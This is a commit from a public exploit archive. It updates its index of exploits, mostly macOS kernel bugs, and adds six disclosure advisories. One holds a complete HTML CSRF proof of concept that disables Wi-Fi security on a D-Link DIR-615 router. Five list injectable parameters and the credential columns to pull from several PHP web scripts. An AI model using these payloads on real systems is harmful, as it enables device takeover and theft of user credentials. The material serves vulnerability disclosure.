DB: 2017-04-06

6 new exploits macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow Apple macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability Apple macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free Apple macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device Apple macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read ImagePro Lazygirls Clone Script - SQL Injection Airbnb Crashpadder Clone Script - SQL Injection Premium Penny Auction Script - SQL Injection Sweepstakes Pro Software - SQL Injection Appointment Script - SQL Injection D-Link DIR-615 - Cross-Site Request Forgery
2017-04-06 05:01:18 +00:00 · 2017-04-06 05:01:18 +00:00 · eed6486b7b
commit eed6486b7b
parent 6624e39c26
7 changed files with 308 additions and 13 deletions
--- a/files.csv
+++ b/files.csv
@ -203,7 +203,7 @@ id,file,description,date,author,platform,type,port
 1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0
 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0
 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0
-41796,platforms/multiple/dos/41796.c,"macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0
+41796,platforms/multiple/dos/41796.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0
 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0
 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0
 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0
@ -1910,9 +1910,9 @@ id,file,description,date,author,platform,type,port
 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0
-41793,platforms/multiple/dos/41793.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0
+41793,platforms/multiple/dos/41793.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0
 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0
-41798,platforms/macos/dos/41798.c,"macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0
+41798,platforms/macos/dos/41798.c,"Apple macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0
 16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080
 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0
 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0
@ -5335,8 +5335,8 @@ id,file,description,date,author,platform,type,port
 40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 - MSHTML CSpliceTreeEngine::RemoveSplice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0
 40947,platforms/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos,0
 40948,platforms/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos,0
-40952,platforms/macos/dos/40952.c,"macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0
-40954,platforms/macos/dos/40954.c,"macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0
+40952,platforms/macos/dos/40952.c,"Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0
+40954,platforms/macos/dos/40954.c,"Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0
 40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
 40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
 40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
@ -5433,13 +5433,13 @@ id,file,description,date,author,platform,type,port
 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
-41791,platforms/macos/dos/41791.c,"macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0
-41792,platforms/multiple/dos/41792.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0
-41797,platforms/macos/dos/41797.c,"macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0
-41794,platforms/multiple/dos/41794.c,"macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
+41791,platforms/macos/dos/41791.c,"Apple macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0
+41792,platforms/multiple/dos/41792.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0
+41797,platforms/macos/dos/41797.c,"Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0
+41794,platforms/multiple/dos/41794.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
-41790,platforms/macos/dos/41790.c,"macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
+41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@ -6805,7 +6805,7 @@ id,file,description,date,author,platform,type,port
 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
-41804,platforms/multiple/local/41804.c,"macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0
+41804,platforms/multiple/local/41804.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0
 40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
 16503,platforms/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
@ -8858,7 +8858,7 @@ id,file,description,date,author,platform,type,port
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
-40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
+40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
@ -15393,7 +15393,7 @@ id,file,description,date,author,platform,type,port
 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
-41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
+41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
@ -37688,3 +37688,9 @@ id,file,description,date,author,platform,type,port
 41774,platforms/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",php,webapps,0
 41779,platforms/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,multiple,webapps,0
 41780,platforms/php/webapps/41780.txt,"Membership Formula - 'order' Parameter SQL Injection",2017-03-31,"Ihsan Sencan",php,webapps,0
+41816,platforms/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41817,platforms/php/webapps/41817.txt,"Airbnb Crashpadder Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41818,platforms/php/webapps/41818.txt,"Premium Penny Auction Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41819,platforms/php/webapps/41819.txt,"Sweepstakes Pro Software - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41820,platforms/php/webapps/41820.txt,"Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41821,platforms/hardware/webapps/41821.txt,"D-Link DIR-615 - Cross-Site Request Forgery",2017-04-05,"Pratik S. Shah",hardware,webapps,0
--- a/platforms/hardware/webapps/41821.txt
+++ b/platforms/hardware/webapps/41821.txt
@ -0,0 +1,160 @@
+Title:
+====
+
+D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability
+
+ 
+
+Credit:
+======
+
+Name: Pratik S. Shah
+
+ 
+
+Reference:
+=========
+
+CVE Details: CVE-2017-7398.
+
+ 
+
+Date:
+====
+
+1-04-2017
+
+ 
+
+Vendor:
+======
+
+D-Link wireless router
+
+ 
+
+Product:
+=======
+
+DIR-615 
+
+
+http://www.dlink.co.in/products/?pid=678
+
+
+Affected Version:
+=============
+
+Hardware: T1 , Firmware: 20.09
+
+ 
+
+Abstract:
+=======
+
+This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
+
+ 
+
+Attack Type:
+===================
+
+Remote
+
+ 
+
+Details:
+=========
+
+CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device. 
+
+ 
+
+Proof Of Concept:
+================
+
+1) User login to D-link DIR 615 wireless router
+
+2) User visits the attacker's malicious web page (DlinkCSRF.html)
+
+3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None
+
+ 
+
+This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method)
+
+Attacker can also tamper following parameters
+
+    hiddenSSID
+    SSID
+    Passwords for all the applicable security options
+
+ 
+
+ 
+
+<html>
+
+  <!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09  -->
+
+  <body>
+
+    <form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
+
+      <input type="hidden" name="domain" value="1" />
+
+      <input type="hidden" name="hiddenSSID" value="on" />
+
+      <input type="hidden" name="ssid" value=“Hacked” />
+
+      <input type="hidden" name="band" value="10" />
+
+      <input type="hidden" name="chan" value="0" />
+
+      <input type="hidden" name="chanwid" value="1" />
+
+      <input type="hidden" name="txRate" value="0" />
+
+      <input type="hidden" name="method&#95;cur" value="6" />
+
+      <input type="hidden" name="method" value="0" />
+
+      <input type="hidden" name="authType" value="1" />
+
+      <input type="hidden" name="length" value="1" />
+
+      <input type="hidden" name="format" value="2" />
+
+      <input type="hidden" name="defaultTxKeyId" value="1" />
+
+      <input type="hidden" name="key1" value="0000000000" />
+
+      <input type="hidden" name="pskFormat" value="0" />
+
+      <input type="hidden" name="pskValue" value=“CSRF@test” />
+
+      <input type="hidden" name="checkWPS2" value="1" />
+
+      <input type="hidden" name="save" value="Apply" />
+
+      <input type="hidden" name="basicrates" value="15" />
+
+      <input type="hidden" name="operrates" value="4095" />
+
+      <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
+
+      <input type="submit" value="Submit request" />
+
+    </form>
+
+  </body>
+
+</html>
+
+ 
+
+Disclosure Timeline:
+======================================
+Vendor Notification: 6th March 2017
+
+
--- a/platforms/php/webapps/41816.txt
+++ b/platforms/php/webapps/41816.txt
@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: ImagePro Lazygirls Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/8-2/
+# Demo: http://imagepro.clonedemo.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?page=31&imageID=[SQL]
+# http://localhost/[PATH]/index.php?page=53&pg_id=[SQL]
+# tc_membergroups:id
+# tc_membergroups:group_name
+# tc_membergroups:admin
+# tc_members:id
+# tc_members:group_id
+# tc_members:username
+# tc_members:password
+# tc_members:email
+# tc_members:join_date
+# # # # #
--- a/platforms/php/webapps/41817.txt
+++ b/platforms/php/webapps/41817.txt
@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Airbnb Crashpadder Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/airbnb-premium-clone-script/
+# Demo: http://airbnb.clonedemo.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/page/1[SQL]
+# http://localhost/[PATH]/view-rental/1/1[SQL]
+# # # # #
--- a/platforms/php/webapps/41818.txt
+++ b/platforms/php/webapps/41818.txt
@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Premium Penny Auction Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/premium-penny-auction-script/
+# Demo: http://pennyauction.clonedemo.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/allauctions.php?aid=[SQL]
+# http://localhost/[PATH]/news.php?nid=[SQL]
+# http://localhost/[PATH]/productdetails.php?aid=[SQL]&pid=[SQL]
+# admin :id
+# admin :username
+# admin :pass
+# affiliate_transaction :aff_id
+# affiliate_transaction :user_id
+# affiliate_transaction :referer_id
+# affiliate_transaction :amount
+# affiliate_transaction :commission
+# affiliate_transaction :bid_pack_title
+# # # # #
--- a/platforms/php/webapps/41819.txt
+++ b/platforms/php/webapps/41819.txt
@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Sweepstakes Pro Software - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/sweepstakes-pro-software/
+# Demo: http://mysweepstakespro.com/demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/win.php?s=[SQL]
+# http://localhost/[PATH]/widget_lb.php?s=[SQL]
+# ss_members :id
+# ss_members :name
+# ss_members :email
+# ss_members :country
+# ss_members :their_username
+# ss_members :their_password
+# # # # #
--- a/platforms/php/webapps/41820.txt
+++ b/platforms/php/webapps/41820.txt
@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: Doctors Appointment Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://appointment-script.com/
+# Software: http://appointment-script.com/demo
+# Demo: http://appointment-script.com/demo
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?lat=[SQL]&lon=[SQL]&category=[SQL]&insurance=[SQL]
+# user
+#    id
+#    first_name
+#    last_name
+#    username
+#    email
+#    password
+#    user_level_id
+# Doctor profile images file upload vulnerability available.
+# http://localhost/[PATH]/images/doctor_image/...
+# # # # #